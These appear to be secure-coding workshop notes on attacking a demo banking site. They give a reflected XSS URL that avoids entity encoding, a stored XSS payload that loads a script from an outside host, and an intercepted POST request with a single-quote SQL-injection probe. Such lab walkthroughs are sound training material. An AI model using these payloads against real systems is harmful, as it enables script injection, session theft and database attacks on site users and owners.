http://zero.webappsecurity.com
Username: username Password: password
Basic XSS Attempt, fails as the input is entity encoded but we can still exploit this.
http://zero.webappsecurity.com/bank/account-activity.html?accountId=18132);</script><script>alert("Secure Coding Workshop")</script>;//992
Instead we change the injected elements to avoid the entity encoding, so no Single and Double Quotes and no Greater Than and Less Than signs.
http://zero.webappsecurity.com/bank/account-activity.html?accountId=18132);alert(1234);//992
The above is a GET request based Reflective XSS. Something in the URL. The following is a POST based XSS.
Head toTransfer Money & Make Payments, in the 'Description' field inject the following
10"><script src=http://xss.im/xs.js></script><p "
Visit the following, 'Pay Bills' -> 'Pay Saved Payee'
This URL is requested when you hit the ? icon next to the Payee, intercept this with your proxy.
http://zero.webappsecurity.com/bank/pay-bills-saved-payee.html
Add a single quote to the end of the name posted so the request looks something like:
POST /bank/pay-bills-get-payee-details.html HTTP/1.1
Host: zero.webappsecurity.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://zero.webappsecurity.com/bank/pay-bills-saved-payee.html
Content-Length: 15
Cookie: JSESSIONID=AE22B6FC
Connection: close
payeeId=sprint'
In the proxy look at the HTTP History and the new response for that request. Here you will see the errors generated.